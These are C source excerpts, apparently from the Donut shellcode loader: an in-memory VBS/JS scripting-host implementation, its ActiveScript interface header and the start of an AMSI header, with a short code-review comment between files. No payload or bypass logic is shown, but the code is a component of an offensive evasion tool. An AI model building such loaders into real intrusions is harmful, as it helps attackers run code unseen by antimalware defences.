123 DPRINT("IActiveScriptSite::AddRef : m_cRef : %i\n", mas->site.m_cRef);
124
125 return mas->site.m_cRef;
126 }
127
128 static STDMETHODIMP_(ULONG) ActiveScript_Release(IActiveScriptSite *this) {
129 MyIActiveScriptSite *mas = (MyIActiveScriptSite*)this;
130
131 ULONG ulRefCount = _InterlockedDecrement(&mas->site.m_cRef);
132
133 DPRINT("IActiveScriptSite::Release : m_cRef : %i\n", ulRefCount);
134 return ulRefCount;
135 }
136
137 static STDMETHODIMP ActiveScript_GetItemInfo(IActiveScriptSite *this,
138 LPCOLESTR objectName, DWORD dwReturnMask,
139 IUnknown **objPtr, ITypeInfo **ppti)
140 {
141 MyIActiveScriptSite *mas = (MyIActiveScriptSite*)this;
142
143 DPRINT("IActiveScriptSite::GetItemInfo(objectName=%p, dwReturnMask=%08lx)",
144 objectName, dwReturnMask);
145
146 if(dwReturnMask & SCRIPTINFO_ITYPEINFO) {
147 DPRINT("Caller is requesting SCRIPTINFO_ITYPEINFO.");
148 if(ppti == NULL) return E_POINTER;
149
150 mas->wscript.lpTypeInfo->lpVtbl->AddRef(mas->wscript.lpTypeInfo);
151 *ppti = mas->wscript.lpTypeInfo;
152 }
153
154 if(dwReturnMask & SCRIPTINFO_IUNKNOWN) {
155 DPRINT("Caller is requesting SCRIPTINFO_IUNKNOWN.");
156 if(objPtr == NULL) return E_POINTER;
157
158 mas->wscript.lpVtbl->AddRef(&mas->wscript);
159 *objPtr = (IUnknown*)&mas->wscript;
160 }
161
162 return S_OK;
163 }
164
165 static STDMETHODIMP ActiveScript_OnScriptError(IActiveScriptSite *this,
166 IActiveScriptError *scriptError)
167 {
168 DPRINT("IActiveScriptSite::OnScriptError");
169
170 EXCEPINFO ei;
171 DWORD dwSourceContext = 0;
172 ULONG ulLineNumber = 0;
173 LONG ichCharPosition = 0;
174 HRESULT hr;
175
176 Memset(&ei, 0, sizeof(EXCEPINFO));
177
178 DPRINT("IActiveScriptError::GetExceptionInfo");
179 hr = scriptError->lpVtbl->GetExceptionInfo(scriptError, &ei);
180 if(hr == S_OK) {
181 DPRINT("IActiveScriptError::GetSourcePosition");
182 hr = scriptError->lpVtbl->GetSourcePosition(
183 scriptError, &dwSourceContext,
184 &ulLineNumber, &ichCharPosition);
185 if(hr == S_OK) {
186 DPRINT("JSError: %ws line[%d:%d]\n",
187 ei.bstrDescription, ulLineNumber, ichCharPosition);
188 }
189 }
190 return S_OK;
191 }
192
193 static STDMETHODIMP ActiveScript_GetLCID(IActiveScriptSite *this, LCID *plcid) {
194 DPRINT("IActiveScriptSite::GetLCID");
195 MyIActiveScriptSite *mas = (MyIActiveScriptSite*)this;
196
197 *plcid = mas->inst->api.GetUserDefaultLCID();
198 return S_OK;
199 }
200
201 static STDMETHODIMP ActiveScript_GetDocVersionString(IActiveScriptSite *this, BSTR *version) {
202 DPRINT("IActiveScriptSite::GetDocVersionString");
203
204 return S_OK;
205 }
206
207 static STDMETHODIMP ActiveScript_OnScriptTerminate(IActiveScriptSite *this,
208 const VARIANT *pvr, const EXCEPINFO *pei)
209 {
210 DPRINT("IActiveScriptSite::OnScriptTerminate");
211
212 return S_OK;
213 }
214
215 static STDMETHODIMP ActiveScript_OnStateChange(IActiveScriptSite *this, SCRIPTSTATE state) {
216 DPRINT("IActiveScriptSite::OnStateChange");
217
218 return S_OK;
219 }
220
221 static STDMETHODIMP ActiveScript_OnEnterScript(IActiveScriptSite *this) {
222 DPRINT("IActiveScriptSite::OnEnterScript");
223
224 return S_OK;
225 }
226
227 static STDMETHODIMP ActiveScript_OnLeaveScript(IActiveScriptSite *this) {
228 DPRINT("IActiveScriptSite::OnLeaveScript");
229
230 return S_OK;
231 }
232
233
234 // ################################################# IActiveScriptSiteWindow ###############################################
235
236 // initialize virtual function table for this interface
237 static VOID ActiveScriptSiteWindow_New(PDONUT_INSTANCE inst, IActiveScriptSiteWindow *this) {
238 // Initialize IUnknown
239 this->lpVtbl->QueryInterface = ADR(LPVOID, ActiveScriptSiteWindow_QueryInterface);
240 this->lpVtbl->AddRef = ADR(LPVOID, ActiveScriptSiteWindow_AddRef);
241 this->lpVtbl->Release = ADR(LPVOID, ActiveScriptSiteWindow_Release);
242
243 // Initialize IActiveScriptSiteWindow
244 this->lpVtbl->GetWindow = ADR(LPVOID, ActiveScriptSiteWindow_GetWindow);
245 this->lpVtbl->EnableModeless = ADR(LPVOID, ActiveScriptSiteWindow_EnableModeless);
246
247 this->m_cRef = 0;
248 this->inst = inst;
249 }
250
251 static STDMETHODIMP ActiveScriptSiteWindow_QueryInterface(IActiveScriptSiteWindow *this, REFIID riid, void **ppv) {
252 OLECHAR *iid;
253 HRESULT hr;
254
255 DPRINT("ActiveScriptSiteWindow::QueryInterface");
256
257 if(ppv == NULL) return E_POINTER;
258
259 // we implement the following interfaces
260 if(IsEqualIID(&this->inst->xIID_IUnknown, riid) ||
261 IsEqualIID(&this->inst->xIID_IActiveScriptSiteWindow, riid))
262 {
263 DPRINT("Returning this interface");
264 *ppv = (LPVOID)this;
265 ActiveScriptSiteWindow_AddRef(this);
266 return S_OK;
267 }
268 DPRINT("Interface not supported");
269 *ppv = NULL;
270 return E_NOINTERFACE;
271 }
272
273 static STDMETHODIMP_(ULONG) ActiveScriptSiteWindow_AddRef(IActiveScriptSiteWindow *this) {
274 _InterlockedIncrement(&this->m_cRef);
275
276 DPRINT("ActiveScriptSiteWindow::AddRef(%i)", this->m_cRef);
277
278 return this->m_cRef;
279 }
280
281 static STDMETHODIMP_(ULONG) ActiveScriptSiteWindow_Release(IActiveScriptSiteWindow *this) {
282 ULONG ulRefCount = _InterlockedDecrement(&this->m_cRef);
283
284 DPRINT("ActiveScriptSiteWindow::Release(%i)", ulRefCount);
285
286 return ulRefCount;
287 }
288
289 static STDMETHODIMP ActiveScriptSiteWindow_GetWindow(IActiveScriptSiteWindow *iface, HWND *phwnd) {
290 DPRINT("ActiveScriptSiteWindow::GetWindow(phwnd=%p)", phwnd);
291 return E_NOTIMPL;
292 }
293
294 static STDMETHODIMP ActiveScriptSiteWindow_EnableModeless(IActiveScriptSiteWindow *iface, BOOL fEnable) {
295 DPRINT("ActiveScriptSiteWindow::EnableModeless(fEnable=%ws)", fEnable ? L"FALSE" : L"TRUE");
296 return E_NOTIMPL;
297 }
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 #ifndef IACTIVESCRIPT_H
32 #define IACTIVESCRIPT_H
33
34 #include "../include/donut.h"
35
36 // required to load and run VBS or JS files
37 typedef struct _IActiveScript IActiveScript;
38 typedef struct _IActiveScriptError IActiveScriptError;
39 typedef struct _IActiveScriptSite IActiveScriptSite;
40 typedef struct _IActiveScriptSiteWindow IActiveScriptSiteWindow;
41 typedef struct _IActiveScriptParse32 IActiveScriptParse32;
42 typedef struct _IActiveScriptParse64 IActiveScriptParse64;
43
44 typedef enum tagSCRIPTSTATE {
45 SCRIPTSTATE_UNINITIALIZED = 0,
46 SCRIPTSTATE_STARTED = 1,
47 SCRIPTSTATE_CONNECTED = 2,
48 SCRIPTSTATE_DISCONNECTED = 3,
49 SCRIPTSTATE_CLOSED = 4,
50 SCRIPTSTATE_INITIALIZED = 5
51 } SCRIPTSTATE;
52
53 typedef enum tagSCRIPTTHREADSTATE {
54 SCRIPTTHREADSTATE_NOTINSCRIPT = 0,
55 SCRIPTTHREADSTATE_RUNNING = 1
56 } SCRIPTTHREADSTATE;
57
58 #define SCRIPTTHREADID_CURRENT 0xFFFFFFFD // The currently executing thread.
59 #define SCRIPTTHREADID_BASE 0xFFFFFFFE // The base thread; that is, the thread in which the scripting engine was instantiated.
60 #define SCRIPTTHREADID_ALL 0xFFFFFFFF // All threads.
61
62 typedef DWORD SCRIPTTHREADID;
63
64 #define SCRIPTITEM_ISPERSISTENT 0x00000001
65 #define SCRIPTITEM_ISVISIBLE 0x00000002
66 #define SCRIPTITEM_ISSOURCE 0x00000004
67 #define SCRIPTITEM_GLOBALMEMBERS 0x00000008
68 #define SCRIPTITEM_EXISTS 0x00000080
69 #define SCRIPTITEM_MULTIINSTANCE 0x00000100
70 #define SCRIPTITEM_CODEONLY 0x00000200
71
72 #define SCRIPTTEXT_ISPERSISTENT 0x00000001
73 #define SCRIPTTEXT_ISVISIBLE 0x00000002
74 #define SCRIPTTEXT_ISEXPRESSION 0x00000020
75 #define SCRIPTTEXT_KEEPDEFINITIONS 0x00000040
76 #define SCRIPTTEXT_ALLOWEXECUTION 0x00000400
77 #define SCRIPTTEXT_ALL_FLAGS (SCRIPTTEXT_ISPERSISTENT | \
78 SCRIPTTEXT_ISVISIBLE | \
79 SCRIPTTEXT_ISEXPRESSION | \
80 SCRIPTTEXT_KEEPDEFINITIONS | \
81 SCRIPTTEXT_ALLOWEXECUTION)
82
83 #define SCRIPTTEXT_HOSTMANAGESSOURCE 0x00000080
84 #define SCRIPTINFO_IUNKNOWN 0x00000001
85 #define SCRIPTINFO_ITYPEINFO 0x00000002
86 #define SCRIPTINFO_ALL_FLAGS (SCRIPTINFO_IUNKNOWN | SCRIPTINFO_ITYPEINFO)
87
88 typedef struct IActiveScriptVtbl {
89 BEGIN_INTERFACE
90
91 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
92 IActiveScript * This,
93 /* [in] */ REFIID riid,
94 /* [annotation][iid_is][out] */
95 void **ppvObject);
96
97 ULONG ( STDMETHODCALLTYPE *AddRef )(
98 IActiveScript * This);
99
100 ULONG ( STDMETHODCALLTYPE *Release )(
101 IActiveScript * This);
102
103 HRESULT ( STDMETHODCALLTYPE *SetScriptSite )(
104 IActiveScript * This,
105 /* [in] */ IActiveScriptSite *pass);
106
107 HRESULT ( STDMETHODCALLTYPE *GetScriptSite )(
108 IActiveScript * This,
109 /* [in] */ REFIID riid,
110 /* [iid_is][out] */ void **ppvObject);
111
112 HRESULT ( STDMETHODCALLTYPE *SetScriptState )(
113 IActiveScript * This,
114 /* [in] */ SCRIPTSTATE ss);
115
116 HRESULT ( STDMETHODCALLTYPE *GetScriptState )(
117 IActiveScript * This,
118 /* [out] */ SCRIPTSTATE *pssState);
119
120 HRESULT ( STDMETHODCALLTYPE *Close )(
121 IActiveScript * This);
122
123 HRESULT ( STDMETHODCALLTYPE *AddNamedItem )(
124 IActiveScript * This,
125 /* [in] */ LPCOLESTR pstrName,
126 /* [in] */ DWORD dwFlags);
127
128 HRESULT ( STDMETHODCALLTYPE *AddTypeLib )(
129 IActiveScript * This,
130 /* [in] */ REFGUID rguidTypeLib,
131 /* [in] */ DWORD dwMajor,
132 /* [in] */ DWORD dwMinor,
133 /* [in] */ DWORD dwFlags);
134
135 HRESULT ( STDMETHODCALLTYPE *GetScriptDispatch )(
136 IActiveScript * This,
137 /* [in] */ LPCOLESTR pstrItemName,
138 /* [out] */ IDispatch **ppdisp);
139
140 HRESULT ( STDMETHODCALLTYPE *GetCurrentScriptThreadID )(
141 IActiveScript * This,
142 /* [out] */ SCRIPTTHREADID *pstidThread);
143
144 HRESULT ( STDMETHODCALLTYPE *GetScriptThreadID )(
145 IActiveScript * This,
146 /* [in] */ DWORD dwWin32ThreadId,
147 /* [out] */ SCRIPTTHREADID *pstidThread);
148
149 HRESULT ( STDMETHODCALLTYPE *GetScriptThreadState )(
150 IActiveScript * This,
151 /* [in] */ SCRIPTTHREADID stidThread,
152 /* [out] */ SCRIPTTHREADSTATE *pstsState);
153
154 HRESULT ( STDMETHODCALLTYPE *InterruptScriptThread )(
155 IActiveScript * This,
156 /* [in] */ SCRIPTTHREADID stidThread,
157 /* [in] */ const EXCEPINFO *pexcepinfo,
158 /* [in] */ DWORD dwFlags);
159
160 HRESULT ( STDMETHODCALLTYPE *Clone )(
161 IActiveScript * This,
162 /* [out] */ IActiveScript **ppscript);
163
164 END_INTERFACE
165 } IActiveScriptVtbl;
166
167 typedef struct _IActiveScript {
168 IActiveScriptVtbl *lpVtbl;
169 } ActiveScript;
170
171 typedef struct IActiveScriptParse32Vtbl {
172 BEGIN_INTERFACE
173
174 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
175 IActiveScriptParse32 * This,
176 /* [in] */ REFIID riid,
177 /* [annotation][iid_is][out] */
178 void **ppvObject);
179
180 ULONG ( STDMETHODCALLTYPE *AddRef )(
181 IActiveScriptParse32 * This);
182
183 ULONG ( STDMETHODCALLTYPE *Release )(
184 IActiveScriptParse32 * This);
185
186 HRESULT ( STDMETHODCALLTYPE *InitNew )(
187 IActiveScriptParse32 * This);
188
189 HRESULT ( STDMETHODCALLTYPE *AddScriptlet )(
190 IActiveScriptParse32 * This,
191 /* [in] */ LPCOLESTR pstrDefaultName,
192 /* [in] */ LPCOLESTR pstrCode,
193 /* [in] */ LPCOLESTR pstrItemName,
194 /* [in] */ LPCOLESTR pstrSubItemName,
195 /* [in] */ LPCOLESTR pstrEventName,
196 /* [in] */ LPCOLESTR pstrDelimiter,
197 /* [in] */ DWORD dwSourceContextCookie,
198 /* [in] */ ULONG ulStartingLineNumber,
199 /* [in] */ DWORD dwFlags,
200 /* [out] */ BSTR *pbstrName,
201 /* [out] */ EXCEPINFO *pexcepinfo);
202
203 HRESULT ( STDMETHODCALLTYPE *ParseScriptText )(
204 IActiveScriptParse32 * This,
205 /* [in] */ LPCOLESTR pstrCode,
206 /* [in] */ LPCOLESTR pstrItemName,
207 /* [in] */ IUnknown *punkContext,
208 /* [in] */ LPCOLESTR pstrDelimiter,
209 /* [in] */ DWORD dwSourceContextCookie,
210 /* [in] */ ULONG ulStartingLineNumber,
211 /* [in] */ DWORD dwFlags,
212 /* [out] */ VARIANT *pvarResult,
213 /* [out] */ EXCEPINFO *pexcepinfo);
214
215 END_INTERFACE
216 } IActiveScriptParse32Vtbl;
217
218 typedef struct _IActiveScriptParse32 {
219 IActiveScriptParse32Vtbl *lpVtbl;
220 } ActiveScriptParse32;
221
222 typedef struct IActiveScriptParse64Vtbl {
223 BEGIN_INTERFACE
224
225 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
226 IActiveScriptParse64 * This,
227 /* [in] */ REFIID riid,
228 /* [annotation][iid_is][out] */
229 void **ppvObject);
230
231 ULONG ( STDMETHODCALLTYPE *AddRef )(
232 IActiveScriptParse64 * This);
233
234 ULONG ( STDMETHODCALLTYPE *Release )(
235 IActiveScriptParse64 * This);
236
237 HRESULT ( STDMETHODCALLTYPE *InitNew )(
238 IActiveScriptParse64 * This);
239
240 HRESULT ( STDMETHODCALLTYPE *AddScriptlet )(
241 IActiveScriptParse64 *This,
242 /* [in] */ LPCOLESTR pstrDefaultName,
243 /* [in] */ LPCOLESTR pstrCode,
244 /* [in] */ LPCOLESTR pstrItemName,
245 /* [in] */ LPCOLESTR pstrSubItemName,
246 /* [in] */ LPCOLESTR pstrEventName,
247 /* [in] */ LPCOLESTR pstrDelimiter,
248 /* [in] */ DWORDLONG dwSourceContextCookie,
249 /* [in] */ ULONG ulStartingLineNumber,
250 /* [in] */ DWORD dwFlags,
251 /* [out] */ BSTR *pbstrName,
252 /* [out] */ EXCEPINFO *pexcepinfo);
253
254 HRESULT ( STDMETHODCALLTYPE *ParseScriptText )(
255 IActiveScriptParse64 *This,
256 /* [in] */ LPCOLESTR pstrCode,
257 /* [in] */ LPCOLESTR pstrItemName,
258 /* [in] */ IUnknown *punkContext,
259 /* [in] */ LPCOLESTR pstrDelimiter,
260 /* [in] */ DWORDLONG dwSourceContextCookie,
261 /* [in] */ ULONG ulStartingLineNumber,
262 /* [in] */ DWORD dwFlags,
263 /* [out] */ VARIANT *pvarResult,
264 /* [out] */ EXCEPINFO *pexcepinfo);
265
266 END_INTERFACE
267 } IActiveScriptParse64Vtbl;
268
269 typedef struct _IActiveScriptParse64 {
270 IActiveScriptParse64Vtbl *lpVtbl;
271 } ActiveScriptParse64;
272
273 typedef struct _IActiveScriptSiteWindowVtbl {
274 BEGIN_INTERFACE
275
276 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
277 IActiveScriptSiteWindow * This,
278 /* [in] */ REFIID riid,
279 /* [annotation][iid_is][out] */
280 void **ppvObject);
281
282 ULONG ( STDMETHODCALLTYPE *AddRef )(
283 IActiveScriptSiteWindow * This);
284
285 ULONG ( STDMETHODCALLTYPE *Release )(
286 IActiveScriptSiteWindow * This);
287
288 HRESULT ( STDMETHODCALLTYPE *GetWindow )(
289 IActiveScriptSiteWindow * This,
290 /* [out] */ HWND *phwnd);
291
292 HRESULT ( STDMETHODCALLTYPE *EnableModeless )(
293 IActiveScriptSiteWindow * This,
294 /* [in] */ BOOL fEnable);
295
296 END_INTERFACE
297 } IActiveScriptSiteWindowVtbl;
298
299 typedef struct _IActiveScriptSiteWindow {
300 IActiveScriptSiteWindowVtbl *lpVtbl;
301 ULONG m_cRef;
302 PDONUT_INSTANCE inst;
303 } ActiveScriptSiteWindow;
304
305 typedef struct _IActiveScriptErrorVtbl {
306 BEGIN_INTERFACE
307
308 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
309 IActiveScriptError * This,
310 /* [in] */ REFIID riid,
311 /* [annotation][iid_is][out] */
312 void **ppvObject);
313
314 ULONG ( STDMETHODCALLTYPE *AddRef )(
315 IActiveScriptError * This);
316
317 ULONG ( STDMETHODCALLTYPE *Release )(
318 IActiveScriptError * This);
319
320 /* [local] */ HRESULT ( STDMETHODCALLTYPE *GetExceptionInfo )(
321 IActiveScriptError * This,
322 /* [out] */ EXCEPINFO *pexcepinfo);
323
324 HRESULT ( STDMETHODCALLTYPE *GetSourcePosition )(
325 IActiveScriptError * This,
326 /* [out] */ DWORD *pdwSourceContext,
327 /* [out] */ ULONG *pulLineNumber,
328 /* [out] */ LONG *plCharacterPosition);
329
330 HRESULT ( STDMETHODCALLTYPE *GetSourceLineText )(
331 IActiveScriptError * This,
332 /* [out] */ BSTR *pbstrSourceLine);
333
334 END_INTERFACE
335 } IActiveScriptErrorVtbl;
336
337 typedef struct _IActiveScriptError {
338 IActiveScriptErrorVtbl *lpVtbl;
339 } ActiveScriptError;
340
341 typedef struct _IActiveScriptSiteVtbl {
342 BEGIN_INTERFACE
343
344 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
345 IActiveScriptSite * This,
346 /* [in] */ REFIID riid,
347 /* [annotation][iid_is][out] */
348 void **ppvObject);
349
350 ULONG ( STDMETHODCALLTYPE *AddRef )(
351 IActiveScriptSite * This);
352
353 ULONG ( STDMETHODCALLTYPE *Release )(
354 IActiveScriptSite * This);
355
356 HRESULT ( STDMETHODCALLTYPE *GetLCID )(
357 IActiveScriptSite * This,
358 /* [out] */ LCID *plcid);
359
360 HRESULT ( STDMETHODCALLTYPE *GetItemInfo )(
361 IActiveScriptSite * This,
362 /* [in] */ LPCOLESTR pstrName,
363 /* [in] */ DWORD dwReturnMask,
364 /* [out] */ IUnknown **ppiunkItem,
365 /* [out] */ ITypeInfo **ppti);
366
367 HRESULT ( STDMETHODCALLTYPE *GetDocVersionString )(
368 IActiveScriptSite * This,
369 /* [out] */ BSTR *pbstrVersion);
370
371 HRESULT ( STDMETHODCALLTYPE *OnScriptTerminate )(
372 IActiveScriptSite * This,
373 /* [in] */ const VARIANT *pvarResult,
374 /* [in] */ const EXCEPINFO *pexcepinfo);
375
376 HRESULT ( STDMETHODCALLTYPE *OnStateChange )(
377 IActiveScriptSite * This,
378 /* [in] */ SCRIPTSTATE ssScriptState);
379
380 HRESULT ( STDMETHODCALLTYPE *OnScriptError )(
381 IActiveScriptSite * This,
382 /* [in] */ IActiveScriptError *pscripterror);
383
384 HRESULT ( STDMETHODCALLTYPE *OnEnterScript )(
385 IActiveScriptSite * This);
386
387 HRESULT ( STDMETHODCALLTYPE *OnLeaveScript )(
388 IActiveScriptSite * This);
389
390 END_INTERFACE
391 } IActiveScriptSiteVtbl;
392
393 typedef struct _IActiveScriptSite {
394 IActiveScriptSiteVtbl *lpVtbl;
395 ULONG m_cRef;
396 } ActiveScriptSite;
397
398 #ifdef _WIN64
399 #define IActiveScriptParse IActiveScriptParse64
400 #define IID_IActiveScriptParse IID_IActiveScriptParse64
401 #else
402 #define IActiveScriptParse IActiveScriptParse32
403 #define IID_IActiveScriptParse IID_IActiveScriptParse32
404 #endif
405
406 static VOID ActiveScript_New(PDONUT_INSTANCE inst, IActiveScriptSite *this);
407
408 static STDMETHODIMP ActiveScript_QueryInterface(IActiveScriptSite *this, REFIID riid, void **ppv);
409 static STDMETHODIMP_(ULONG) ActiveScript_AddRef(IActiveScriptSite *this);
410 static STDMETHODIMP_(ULONG) ActiveScript_Release(IActiveScriptSite *this);
411
412 // Informs the host that the scripting engine has begun executing the script code.
413 static STDMETHODIMP ActiveScript_OnEnterScript(IActiveScriptSite *this);
414
415 // Informs the host that the scripting engine has returned from executing script code.
416 static STDMETHODIMP ActiveScript_OnLeaveScript(IActiveScriptSite *this);
417
418 // Retrieves the locale identifier that the host uses for displaying user-interface elements.
419 static STDMETHODIMP ActiveScript_GetLCID(IActiveScriptSite *this, LCID *lcid);
420
421 // Retrieves a host-defined string that uniquely identifies the current document version from the host's point of view.
422 static STDMETHODIMP ActiveScript_GetDocVersionString(IActiveScriptSite *this, BSTR *version);
423
424 // Informs the host that an execution error occurred while the engine was running the script.
425 static STDMETHODIMP ActiveScript_OnScriptError(IActiveScriptSite *this, IActiveScriptError *scriptError);
426
427 // Informs the host that the scripting engine has changed states.
428 static STDMETHODIMP ActiveScript_OnStateChange(IActiveScriptSite *this, SCRIPTSTATE state);
429
430 // Obtains information about an item that was added to an engine through a call to the IActiveScript::AddNamedItem method.
431 static STDMETHODIMP ActiveScript_GetItemInfo(IActiveScriptSite *this, LPCOLESTR objectName, DWORD dwReturnMask, IUnknown **objPtr, ITypeInfo **typeInfo);
432
433 // Called when the script has completed execution.
434 static STDMETHODIMP ActiveScript_OnScriptTerminate(IActiveScriptSite *this, const VARIANT *pvr, const EXCEPINFO *pei);
435
436 // ################################################# IActiveScriptSiteWindow ###############################################
437 static VOID ActiveScriptSiteWindow_New(PDONUT_INSTANCE inst, IActiveScriptSiteWindow *this);
438
439 // IUnknown
440 static STDMETHODIMP ActiveScriptSiteWindow_QueryInterface(IActiveScriptSiteWindow *this, REFIID riid, void **ppv);
441 static STDMETHODIMP_(ULONG) ActiveScriptSiteWindow_AddRef(IActiveScriptSiteWindow *this);
442 static STDMETHODIMP_(ULONG) ActiveScriptSiteWindow_Release(IActiveScriptSiteWindow *this);
443
444 // IActiveScriptSiteWindow
445 static STDMETHODIMP ActiveScriptSiteWindow_GetWindow(IActiveScriptSiteWindow *iface, HWND *phwnd);
446 static STDMETHODIMP ActiveScriptSiteWindow_EnableModeless(IActiveScriptSiteWindow *iface, BOOL fEnable);
447
448 #endif
449
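Review bot: `m_cRef` is declared `ULONG` in both `_IActiveScriptSiteWindow` and `_IActiveScriptSite`, but the `ActiveScriptSiteWindow_AddRef`/`_Release` bodies shown earlier on this page pass `&this->m_cRef` to `_InterlockedIncrement` and `_InterlockedDecrement`, which operate on a `volatile LONG *`. Declaring the field as `volatile LONG m_cRef;` in both structs would remove the signed/unsigned pointer mismatch. Separately, the prototypes at the end of the header are all `static`, so every translation unit that includes it needs its own definitions. If only the implementation file is meant to include it (not visible from here), a one-line comment such as `// internal header: include only from the file that defines these functions` would make that explicit.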
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 #ifndef AMSI_H
32 #define AMSI_H
33
34 #include <windows.h>
35
36 DECLARE_HANDLE(HAMSICONTEXT);
37 DECLARE_HANDLE(HAMSISESSION);
38
39 typedef struct _IAmsiStream IAmsiStream;
40 typedef struct _IAntimalware IAntimalware;
41 typedef struct _IAntimalwareProvider IAntimalwareProvider;
42
43 typedef enum tagAMSI_RESULT {
44 // No detection found. Result likely not going to change after future definition update.
45 // a.k.a. known good
46 AMSI_RESULT_CLEAN = 0,
47 // No detection found. Result might change after future definition update.
48 AMSI_RESULT_NOT_DETECTED = 1,
49 // Detection found. It is recommended to abort executing the content if it is executable, e.g. a script.
50 // Return result of 1 - 32767 is estimated risk level that an antimalware provider might indicate.
51 // The large the result, the riskier to continue.
52 // Any return result equal to or larger than 32768 is consider malware and should be blocked.
53 // These values are provider specific, and may indicate malware family or ID.
54 // An application should use AmsiResultIsMalware() to determine whether the content should be blocked.
55 AMSI_RESULT_DETECTED = 32768,
56 } AMSI_RESULT;
57
58 typedef enum tagAMSI_ATTRIBUTE {
59 // Name/version/GUID string of the calling application.
60 AMSI_ATTRIBUTE_APP_NAME = 0,
61 // LPWSTR, filename, URL, script unique id etc.
62 AMSI_ATTRIBUTE_CONTENT_NAME = 1,
63 // ULONGLONG, size of the input. Mandatory.
64 AMSI_ATTRIBUTE_CONTENT_SIZE = 2,
65 // PVOID, memory address if content is fully loaded in memory. Mandatory unless
66 // Read() is implemented instead to support on-demand content retrieval.
67 AMSI_ATTRIBUTE_CONTENT_ADDRESS = 3,
68 // PVOID, session is used to associate different scan calls, e.g. if the contents
69 // to be scanned belong to the sample original script. Return nullptr if content
70 // is self-contained. Mandatory.
71 AMSI_ATTRIBUTE_SESSION = 4,
72 } AMSI_ATTRIBUTE;
73
74 typedef struct IAmsiStreamVtbl {
75 BEGIN_INTERFACE
76
77 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
78 IAmsiStream * This,
79 REFIID riid,
80 void **ppvObject);
81
82 ULONG ( STDMETHODCALLTYPE *AddRef )(
83 IAmsiStream * This);
84
85 ULONG ( STDMETHODCALLTYPE *Release )(
86 IAmsiStream * This);
87
88 HRESULT ( STDMETHODCALLTYPE *GetAttribute )(
89 IAmsiStream * This,
90 AMSI_ATTRIBUTE attribute,
91 ULONG dataSize,
92 unsigned char *data,
93 ULONG *retData);
94
95 HRESULT ( STDMETHODCALLTYPE *Read )(
96 IAmsiStream * This,
97 ULONGLONG position,
98 ULONG size,
99 unsigned char *buffer,
100 ULONG *readSize);
101
102 END_INTERFACE
103 } IAmsiStreamVtbl;
104
105 typedef struct _IAmsiStream {
106 IAmsiStreamVtbl *lpVtbl;
107 } AmsiStream;
108
109 typedef struct IAntimalwareProviderVtbl {
110 BEGIN_INTERFACE
111
112 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
113 IAntimalwareProvider * This,
114 REFIID riid,
115 void **ppvObject);
116
117 ULONG ( STDMETHODCALLTYPE *AddRef )(
118 IAntimalwareProvider * This);
119
120 ULONG ( STDMETHODCALLTYPE *Release )(
121 IAntimalwareProvider * This);
122
123 HRESULT ( STDMETHODCALLTYPE *Scan )(
124 IAntimalwareProvider * This,
125 IAmsiStream *stream,
126 AMSI_RESULT *result);
127
